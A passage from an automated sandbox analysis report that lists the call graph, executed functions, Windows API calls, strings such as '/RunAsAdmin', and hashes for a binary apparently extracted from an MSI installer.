ae7ae1 34879->34881 34880->34696 34881->34696 34882 ae7755 34882->34875 34884 ae7766 34882->34884 34953 b10d39 43 API calls 34883->34953 34954 ae2100 42 API calls 4 library calls 34884->34954 34886 ae784f 34887 ae78ad 34886->34887 34888 ae78a4 GetForegroundWindow 34886->34888 34889 ae78bd ShellExecuteExW 34887->34889 34888->34887 34890 ae78ce 34889->34890 34891 ae78d7 34889->34891 34957 ae7c30 6 API calls 34890->34957 34894 ae7912 34891->34894 34896 ae78ed ShellExecuteExW 34891->34896 34892 ae7816 GetWindowsDirectoryW 34955 ae1980 70 API calls 34892->34955 34899 ae79c8 34894->34899 34900 ae7938 GetModuleHandleW GetProcAddress 34894->34900 34896->34894 34898 ae7909 34896->34898 34897 ae7837 34956 ae1980 70 API calls 34897->34956 34958 ae7c30 6 API calls 34898->34958 34904 ae79f2 34899->34904 34907 ae79dc WaitForSingleObject GetExitCodeProcess 34899->34907 34906 ae7952 AllowSetForegroundWindow 34900->34906 34901 ae777b 34901->34886 34901->34892 34959 ae7d30 CloseHandle 34904->34959 34906->34899 34908 ae7960 34906->34908 34907->34904 34908->34899 34909 ae7969 GetModuleHandleW GetProcAddress 34908->34909 34909->34899 34910 ae7984 34909->34910 34910->34899 34914 ae7995 Sleep EnumWindows 34910->34914 34911 ae79fe 34912 b07708 __ehhandler$___std_fs_get_file_id@8 5 API calls 34911->34912 34913 ae7a73 34912->34913 34913->34696 34914->34910 34915 ae79c1 BringWindowToTop 34914->34915 34915->34899 34917 ae2548 34916->34917 34919 ae259c 34916->34919 34937 b07875 6 API calls 34917->34937 34920 ae1ff0 34919->34920 34940 b07875 6 API calls 34919->34940 34920->34804 34920->34807 34921 ae2552 34921->34919 34923 ae255e GetProcessHeap 34921->34923 34938 b07b87 44 API calls 34923->34938 34924 ae25b6 34924->34920 34941 b07b87 44 API calls 34924->34941 34926 ae258b 34939 b0782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34926->34939 34929 ae2616 34942 b0782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34929->34942 34931->34810 34932->34814 34933->34815 34934->34818 34935->34818 34936->34808 34937->34921 34938->34926 34939->34919 34940->34924 34941->34929 34942->34920 34943->34858 34944->34858 34945->34858 34946->34858 34948->34850 34949->34870 34950->34872 34951->34874 34952->34883 34953->34882 34954->34901 34955->34897 34956->34886 34957->34891 34958->34894 34959->34911 34960->34879

                                                                        Executed Functions

                                                                        Function 00AE6EE0 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 519comCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 ae6ee0-ae6f31 call ae5f90 3 ae6f55-ae6f8d CoInitialize CoCreateInstance 0->3 4 ae6f33-ae6f50 call ae7660 0->4 6 ae6f8f-ae6f93 3->6 7 ae6f98-ae6fe6 VariantInit 3->7 10 ae74ff-ae7519 call b07708 4->10 9 ae74d8-ae74e1 6->9 17 ae6fe8-ae6fec 7->17 18 ae6ff1-ae7015 IUnknown_QueryService 7->18 11 ae74e9-ae74f4 9->11 12 ae74e3-ae74e5 9->12 15 ae74fc 11->15 16 ae74f6 CoUninitialize 11->16 12->11 15->10 16->15 19 ae74ba-ae74c3 17->19 20 ae7017-ae701b 18->20 21 ae7020-ae703a 18->21 24 ae74cb-ae74d6 VariantClear 19->24 25 ae74c5-ae74c7 19->25 23 ae74a9-ae74b2 20->23 28 ae703c-ae7040 21->28 29 ae7045-ae7066 21->29 23->19 27 ae74b4-ae74b6 23->27 24->9 25->24 27->19 30 ae7498-ae74a1 28->30 33 ae7068-ae706c 29->33 34 ae7071-ae708f IUnknown_QueryInterface_Proxy 29->34 30->23 31 ae74a3-ae74a5 30->31 31->23 35 ae7487-ae7490 33->35 36 ae709a-ae70b4 34->36 37 ae7091-ae7095 34->37 35->30 39 ae7492-ae7494 35->39 42 ae70bf-ae70dd IUnknown_QueryInterface_Proxy 36->42 43 ae70b6-ae70ba 36->43 38 ae7476-ae747f 37->38 38->35 40 ae7481-ae7483 38->40 39->30 40->35 45 ae70df-ae70e3 42->45 46 ae70e8-ae7100 CoAllowSetForegroundWindow 42->46 44 ae7465-ae746e 43->44 44->38 50 ae7470-ae7472 44->50 47 ae7454-ae745d 45->47 48 ae7168-ae7175 SysAllocString 46->48 49 ae7102-ae7104 46->49 47->44 52 ae745f-ae7461 47->52 53 ae717b 48->53 54 ae7529-ae7571 call ae1910 48->54 51 ae710a-ae712d SysAllocString 49->51 50->38 55 ae712f-ae7132 51->55 56 ae7138-ae715b SysAllocString 51->56 52->44 53->51 64 ae7579-ae7587 54->64 65 ae7573-ae7575 54->65 55->56 58 ae751f-ae7524 call af1cb0 55->58 59 ae717d-ae71ff VariantInit 56->59 60 ae715d-ae7160 56->60 58->54 67 ae720a-ae720e 59->67 68 ae7201-ae7205 59->68 60->58 63 ae7166 60->63 63->59 65->64 69 ae740b 67->69 70 ae7214 67->70 71 ae740f-ae744e VariantClear * 4 SysFreeString 68->71 69->71 72 ae7216-ae7238 70->72 71->47 73 ae7240-ae7249 72->73 73->73 74 ae724b-ae72c5 call ae3b40 call ae40a0 call ae61d0 call ae3cc0 73->74 83 ae72f6-ae7315 74->83 84 ae72c7-ae72d8 74->84 85 ae731d 83->85 86 ae7317-ae731b 83->86 87 ae72da-ae72e5 84->87 88 ae72eb-ae72ed 84->88 89 ae7324-ae7326 85->89 86->89 87->88 90 ae751a call b0c5c2 87->90 88->83 91 ae72ef-ae72f0 LocalFree 88->91 92 ae7328-ae7332 89->92 93 ae73a5-ae73b5 89->93 90->58 91->83 95 ae7344-ae7378 OpenProcess WaitForSingleObject 92->95 96 ae7334-ae7342 call ae6a60 92->96 97 ae73fc-ae7405 93->97 98 ae73b7-ae73c6 93->98 100 ae737a-ae737c GetExitCodeProcess 95->100 101 ae7382-ae7392 95->101 96->95 97->69 97->72 102 ae73c8-ae73d3 98->102 103 ae73d9-ae73db 98->103 100->101 101->93 107 ae7394-ae739b CloseHandle 101->107 102->90 102->103 104 ae73dd-ae73de LocalFree 103->104 105 ae73e4-ae73f5 103->105 104->105 105->97 107->93
                                                                        APIs
                                                                          • Part of subcall function 00AE5F90: GetCurrentProcess.KERNEL32(00000008,?,1816BA6E), ref: 00AE5FA0
                                                                          • Part of subcall function 00AE5F90: OpenProcessToken.ADVAPI32(00000000), ref: 00AE5FA7
                                                                        • CoInitialize.OLE32(00000000), ref: 00AE6F55
                                                                        • CoCreateInstance.OLE32(00B2D310,00000000,00000004,00B3B320,00000000,?), ref: 00AE6F85
                                                                        • CoUninitialize.OLE32 ref: 00AE74F6
                                                                        • _com_issue_error.COMSUPP ref: 00AE7524
                                                                          • Part of subcall function 00AE1910: LocalFree.KERNEL32(?,1816BA6E,?,00000000,00B292C0,000000FF,?,?,00B41348,00000000,00AE16D0,80004005), ref: 00AE195C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                        • String ID: $
                                                                        • API String ID: 2507920217-3993045852
                                                                        • Opcode ID: aa09e96ee25152b04aee110d1a9d8191599d09954a065f866d97471c8e4bf60f
                                                                        • Instruction ID: f2057b686811854e97773855a0d6f9e0c3efbb04547946ad3f22af454ace403a
                                                                        • Opcode Fuzzy Hash: aa09e96ee25152b04aee110d1a9d8191599d09954a065f866d97471c8e4bf60f
                                                                        • Instruction Fuzzy Hash: F7229F70E08388DFEB11CFA9C948BADBBB8AF55304F248199E405EB291DB759E45CB11
                                                                        Function 00AE5F90 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 108 ae5f90-ae5faf GetCurrentProcess OpenProcessToken 109 ae5fb7-ae5fe4 GetTokenInformation 108->109 110 ae5fb1-ae5fb6 108->110 111 ae5fee-ae5ffe CloseHandle 109->111 112 ae5fe6-ae5feb 109->112 112->111
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,1816BA6E), ref: 00AE5FA0
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AE5FA7
                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00AE5FDC
                                                                        • CloseHandle.KERNEL32(?), ref: 00AE5FF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                        • String ID:
                                                                        • API String ID: 215268677-0
                                                                        • Opcode ID: abad2a91f0437567a8dbd5e5be88809f81c5112ebcc3fd6d2322b7dd940a70ac
                                                                        • Instruction ID: 6922055baecad877791a58ac50a29ea47b5d07074652a4565f3b601864e7c221
                                                                        • Opcode Fuzzy Hash: abad2a91f0437567a8dbd5e5be88809f81c5112ebcc3fd6d2322b7dd940a70ac
                                                                        • Instruction Fuzzy Hash: 27F01D74544301ABEB209F20EC59BABBBE8BB84704F508819F984C22A0D779D51EDA63
                                                                        Function 00AF1A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(1816BA6E,?,0000FFFF), ref: 00AF1A4D
                                                                          • Part of subcall function 00AE4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00AE4EDD
                                                                        • ExitProcess.KERNEL32 ref: 00AF1C27
                                                                          • Part of subcall function 00AE8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AE880D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                        • String ID: Full command line:
                                                                        • API String ID: 1878577176-831861440
                                                                        • Opcode ID: 114f97fcdb7c48ac0ee392466a59375ef421057e867695ec10c9aa0478bc296d
                                                                        • Instruction ID: 307fbd8bba3a21557f11ca3fdddd5010d13b3a482c6156b60e065ca5e70f667c
                                                                        • Opcode Fuzzy Hash: 114f97fcdb7c48ac0ee392466a59375ef421057e867695ec10c9aa0478bc296d
                                                                        • Instruction Fuzzy Hash: 49518E318101A8DBCF25EB61CD99BEEB7B5AF50300F1445D8E109A72A2EF741F49CBA1
                                                                        Function 00AE7FD0 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 171 ae7fd0-ae804c GetTokenInformation 172 ae804e-ae8057 GetLastError 171->172 173 ae80b0-ae80c3 171->173 172->173 174 ae8059-ae8067 172->174 175 ae806e 174->175 176 ae8069-ae806c 174->176 178 ae809e-ae80aa GetTokenInformation 175->178 179 ae8070-ae8077 175->179 177 ae809b 176->177 177->178 178->173 180 ae8079-ae8085 call ae8260 179->180 181 ae8087-ae8098 call b08e90 179->181 180->178 181->177
                                                                        APIs
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE8044
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE804E
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE80AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: InformationToken$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2567405617-0
                                                                        • Opcode ID: 5604f40d6c67ba6f07a75c37260d2cef4f5c0b9a6146d73cb220eb99927b62f3
                                                                        • Instruction ID: 6bd65d526abc37c23bdb3226b7cb4a47a3c9617eb25710f2f5e16ba1bbe8744e
                                                                        • Opcode Fuzzy Hash: 5604f40d6c67ba6f07a75c37260d2cef4f5c0b9a6146d73cb220eb99927b62f3
                                                                        • Instruction Fuzzy Hash: FD316F71A006159FD720CF59CC45BAFFBF9FB44710F10452DE519A7280DBB5A9048BA0
                                                                        Function 00B1C72B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 186 b1c72b-b1c736 187 b1c744-b1c74a 186->187 188 b1c738-b1c742 186->188 190 b1c763-b1c774 RtlAllocateHeap 187->190 191 b1c74c-b1c74d 187->191 188->187 189 b1c778-b1c783 call b0c6b0 188->189 195 b1c785-b1c787 189->195 192 b1c776 190->192 193 b1c74f-b1c756 call b1a8b7 190->193 191->190 192->195 193->189 199 b1c758-b1c761 call b215f6 193->199 199->189 199->190
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B1AFDA,00000001,00000364,?,00000006,000000FF,?,00B0C282,?,?,?), ref: 00B1C76C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: d6da8dff3c3e48257a12c21db4ee8e04b989841a2e5e0933a0f07f5322aecf41
                                                                        • Instruction ID: 242879fb9992d2086391c74eb3139fd192d5e2d07ebd78e63bfcb6fe7cb5a504
                                                                        • Opcode Fuzzy Hash: d6da8dff3c3e48257a12c21db4ee8e04b989841a2e5e0933a0f07f5322aecf41
                                                                        • Instruction Fuzzy Hash: 29F0E93158163467EB312B659C49ADB3FCCDF52B71BA442D1AC04A71C0CFB0DC818AE1

                                                                        Non-executed Functions

                                                                        Function 00AED060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf$FreeLocal
                                                                        • String ID: %$+
                                                                        • API String ID: 2429749586-2626897407
                                                                        • Opcode ID: 3d1c9b35e25b25dd7d06524dd49a622e886d5acde66daf71be0b679ddde3e544
                                                                        • Instruction ID: f23555cffdb56e072223e5f565107f59287e47ca944bdc056ef07a3fea6181ba
                                                                        • Opcode Fuzzy Hash: 3d1c9b35e25b25dd7d06524dd49a622e886d5acde66daf71be0b679ddde3e544
                                                                        • Instruction Fuzzy Hash: C802FF71E10259DFDB15DFA9CC40BAEBBB5FF49300F148629F911AB281DB34A941CBA1
                                                                        Function 00AF0E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00AF12C4
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00B457C0,00000800), ref: 00AF12E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue
                                                                        • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                        • API String ID: 4153817207-1914306501
                                                                        • Opcode ID: 1d99275050034071f8fd85c865bb5fe46b9b975404381f95c3d32700610e177a
                                                                        • Instruction ID: e8a41c3db1ecd4fabde1b6e1bdb229d1cdc2d32471ba897b32c0edaf4ae10ea9
                                                                        • Opcode Fuzzy Hash: 1d99275050034071f8fd85c865bb5fe46b9b975404381f95c3d32700610e177a
                                                                        • Instruction Fuzzy Hash: E8E1F225A0435ACACB349F94C840A76B3E1EF95740F5985ADFB85CB296EB718C82C391
                                                                        Function 00B23BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00B23EC1,00000002,00000000,?,?,?,00B23EC1,?,00000000), ref: 00B23C3C
                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00B23EC1,00000002,00000000,?,?,?,00B23EC1,?,00000000), ref: 00B23C65
                                                                        • GetACP.KERNEL32(?,?,00B23EC1,?,00000000), ref: 00B23C7A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: 8f80d25ece5ce68382fbf78115d1046a815d08fef2943aece5d3fe27bae23795
                                                                        • Instruction ID: 1f63324863083b81bd7c65d8198aa02dc451fcdc0de74dc913fa26f4a4282ce7
                                                                        • Opcode Fuzzy Hash: 8f80d25ece5ce68382fbf78115d1046a815d08fef2943aece5d3fe27bae23795
                                                                        • Instruction Fuzzy Hash: 8421B332700220BADB348F19E945A97B3E6EB50F60B5689A4E90EF7110E736DF41C350
                                                                        Function 00B23D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B1AE3C: GetLastError.KERNEL32(?,00000008,00B203BC), ref: 00B1AE40
                                                                          • Part of subcall function 00B1AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B1AEE2
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B23E84
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00B23ECD
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00B23EDC
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B23F24
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B23F43
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        • Opcode ID: 49685535e6c223b511147ddb7a65d9220f66831fd9f539ea83e7f4978e11168f
                                                                        • Instruction ID: 55ef29504adc40854e2900c790fe61d8879509b3fef15feb9ba36ea7682aca64
                                                                        • Opcode Fuzzy Hash: 49685535e6c223b511147ddb7a65d9220f66831fd9f539ea83e7f4978e11168f
                                                                        • Instruction Fuzzy Hash: 70516172A00225ABDF20EFA5EC45AAE77F8EF48B00F1544A5E518E7150EB74DF488B61
                                                                        Function 00B1B336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction ID: c81336c63611411b1cf2c37b174db4b927d9c79064da75f0a59586bc32b4a5a6
                                                                        • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction Fuzzy Hash: 80B149729002559FDB158F68C891FEEBBE6EF69350F5481EAE805AB341D3349D81CBA0
                                                                        Function 00B2069D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00B20738
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B207B3
                                                                        • FindClose.KERNEL32(00000000), ref: 00B207D5
                                                                        • FindClose.KERNEL32(00000000), ref: 00B207F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1164774033-0
                                                                        • Opcode ID: 086176f69beb42fe116f1b31c02b7316587cb5c75db654465948c1dc36bc27d9
                                                                        • Instruction ID: 4fa6350e170b80b229a9e9d86632dabdb704c8803418fee5e1053f9d9fb79fa4
                                                                        • Opcode Fuzzy Hash: 086176f69beb42fe116f1b31c02b7316587cb5c75db654465948c1dc36bc27d9
                                                                        • Instruction Fuzzy Hash: 89417271910239AFDB20FF64EC89EAEB7F9EB85314F1441D5E40997192EA309E85CF50
                                                                        Function 00B083BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B083C9
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B08495
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B084B5
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00B084BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 34a95a0338cccef838c2212a43f2fe154596adcc1975d1600576f252e8ba2915
